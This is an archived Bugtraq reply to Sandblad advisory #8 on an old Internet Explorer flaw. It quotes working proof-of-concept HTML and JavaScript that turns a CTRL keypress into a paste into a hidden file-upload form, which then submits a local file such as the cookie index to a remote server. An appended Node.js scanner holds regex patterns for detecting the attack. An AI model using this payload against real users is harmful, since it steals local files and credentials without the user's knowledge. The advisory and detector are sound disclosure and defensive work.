Bugtraq mailing list archives
Re: Pressing CTRL in IE is dangerous - Sandblad advisory #8
From: Peter Pentchev <roam () ringlet net>
Date: Wed, 24 Jul 2002 11:42:01 +0300
On Tue, Jul 23, 2002 at 09:50:30PM +0200, Andreas Sandblad wrote:
- Sandblad advisory #8 -
---..---..---..---..---..---..---..---..---..---..---..---..----
Title: Pressing CTRL in IE is dangerous
Date: [2002-07-23]
Software: Internet Explorer
Impact: Pressing CTRL in IE may result in an arbitrary local file being uploaded to a remote server (no exact path needed). If special sensitive information is uploaded, it may be used to run remote programs.
[snip]
1. When a user presses the CTRL key an onkeydown event can be set to fire. In the event function the key pressed is changed to 'V'. The result will be a paste operation with fewer restrictions.
2. The content of the clipboard is altered and focus is changed to a hidden file upload form. The paste operation will be performed into the form, yielding a change of value for the file upload field (not normally allowed).
3. The upload form is submitted automatically (legal javascript operation).
[snip]
<div id=h style="zoom:0.0001">
<form name=u enctype="multipart/form-data" method=post action=upload.php>
<input type=file name=file></form></div>
<script>
//uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
uploadFile="..\\Cookies\\index.dat";
function gotKey(){
  if (!event.ctrlKey) return;
  document.onkeydown = null;
  event.keyCode = 86;
  window.clipboardData.setData("Text",uploadFile);
  (p=document.forms.u.file).focus();
  p.onpropertychange = function(){document.forms.u.submit()};
}
document.onkeydown = gotKey;
window.onload=function(){document.body.focus()};
</script>
This was verified to work on various versions of IE 5 and 6, and also on Opera 6.01 build 1041. However, Mozilla 1.0rc1 is NOT vulnerable, partly because of a script error (the onkeypress handler should accept a parameter instead of referring to 'event' directly), and mostly because of the fact that in Mozilla, event.keyCode is not settable.

G'luck,
Peter

-- 
Peter Pentchev  roam () ringlet net  roam () FreeBSD org
PGP key:        http://people.FreeBSD.org/~roam/roam.key.asc
Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553
If you think this sentence is confusing, then change one pig.
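As an added example (not part of Sandblad's advisory or Pentchev's reply), the following Node.js heuristic turns the three attack steps quoted above into static indicators and flags a page that carries most of them, which is the kind of check a web proxy or content scanner of that era could have applied. Both HTML samples are constructed here for the demonstration; the first mirrors the advisory's proof of concept, the second is an ordinary upload form with a Ctrl+S shortcut.

```javascript
// Heuristic scanner for the "CTRL -> paste into hidden file input" pattern from
// Sandblad advisory #8. Each indicator is one link of the chain the advisory
// describes; a page that carries most of them at once is a strong signal.
const INDICATORS = [
  // step 1: a key handler rewrites the pressed key to 'V' (keyCode 86)
  { name: 'key-rewrite',      re: /\bkeyCode\s*=(?!=)\s*86\b/ },
  // step 2: the page writes attacker-chosen text to the clipboard
  { name: 'clipboard-write',  re: /clipboardData\.setData\s*\(/ },
  // step 2: there is a file upload field to paste into ...
  { name: 'file-input',       re: /<input[^>]*type\s*=\s*["']?file\b/i },
  // ... hidden from the user (tiny zoom, display:none or visibility:hidden)
  { name: 'hidden-container', re: /zoom\s*:\s*0?\.0+1|display\s*:\s*none|visibility\s*:\s*hidden/i },
  // step 3: the form submits itself as soon as the field value changes
  { name: 'auto-submit',      re: /onpropertychange[\s\S]{0,120}?\.submit\s*\(/i },
];

// Returns the indicator names present in `html` plus a verdict. The verdict
// requires the two essential links (clipboard write and a file input) and at
// least one more indicator, so a plain upload form alone is never flagged.
function scanHtml(html) {
  const matched = INDICATORS.filter(i => i.re.test(html)).map(i => i.name);
  const suspicious = matched.includes('clipboard-write') &&
                     matched.includes('file-input') && matched.length >= 3;
  return { matched, suspicious };
}

// Constructed sample 1: the shape of the advisory's proof of concept.
const POC_SAMPLE = `
<div id=h style="zoom:0.0001"><form name=u enctype="multipart/form-data" method=post action=upload.php>
<input type=file name=file></form></div>
<script>
function gotKey(){ if (!event.ctrlKey) return; event.keyCode = 86;
  window.clipboardData.setData("Text", uploadFile);
  (p=document.forms.u.file).focus();
  p.onpropertychange = function(){document.forms.u.submit()}; }
document.onkeydown = gotKey;
</script>`;

// Constructed sample 2: an ordinary upload form with a Ctrl+S shortcut; the only
// indicator it shares with the attack is the file input, so it must not be flagged.
const BENIGN_SAMPLE = `
<form enctype="multipart/form-data" method=post action=upload.php>
<input type=file name=avatar> <input type=submit value=Upload></form>
<script>document.onkeydown = function(e){ if (e.ctrlKey && e.keyCode===83) { save(); return false; } };</script>`;

console.log('poc   ', scanHtml(POC_SAMPLE));
console.log('benign', scanHtml(BENIGN_SAMPLE));
```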